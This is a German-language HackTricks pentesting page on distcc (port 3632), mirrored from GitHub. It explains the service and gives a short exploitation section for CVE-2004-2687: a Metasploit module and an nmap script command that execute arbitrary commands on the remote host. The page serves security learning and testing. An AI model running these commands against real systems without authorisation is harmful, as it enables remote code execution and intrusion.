mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-19 09:34:03 +00:00
41 lines
2.4 KiB
Markdown
41 lines
2.4 KiB
Markdown
<details>
|
|
|
|
<summary><strong>Erlernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Andere Möglichkeiten, HackTricks zu unterstützen:
|
|
|
|
* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
|
|
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com)
|
|
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
|
|
|
|
</details>
|
|
|
|
|
|
# Grundlegende Informationen
|
|
|
|
**Distcc** ist ein Tool, das den **Kompilierungsprozess** verbessert, indem es die **unbenutzte Rechenleistung** anderer Computer im Netzwerk nutzt. Wenn **distcc** auf einer Maschine eingerichtet ist, kann diese Maschine ihre **Kompilierungsaufgaben** an ein anderes System verteilen. Dieses Empfängersystem muss den **distccd-Daemon** ausführen und einen **kompatiblen Compiler** installiert haben, um den gesendeten Code zu verarbeiten.
|
|
|
|
**Standardport:** 3632
|
|
```
|
|
PORT STATE SERVICE
|
|
3632/tcp open distccd
|
|
```
|
|
# Ausnutzung
|
|
|
|
Überprüfen Sie, ob es anfällig für **CVE-2004-2687** ist, um beliebigen Code auszuführen:
|
|
```bash
|
|
msf5 > use exploit/unix/misc/distcc_exec
|
|
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
|
|
```
|
|
# Shodan
|
|
|
|
_Ich glaube nicht, dass Shodan diesen Dienst erkennt._
|
|
|
|
# Ressourcen
|
|
|
|
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
|
|
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
|
|
|
|
Beitrag erstellt von **Álex B (@r1p)**
|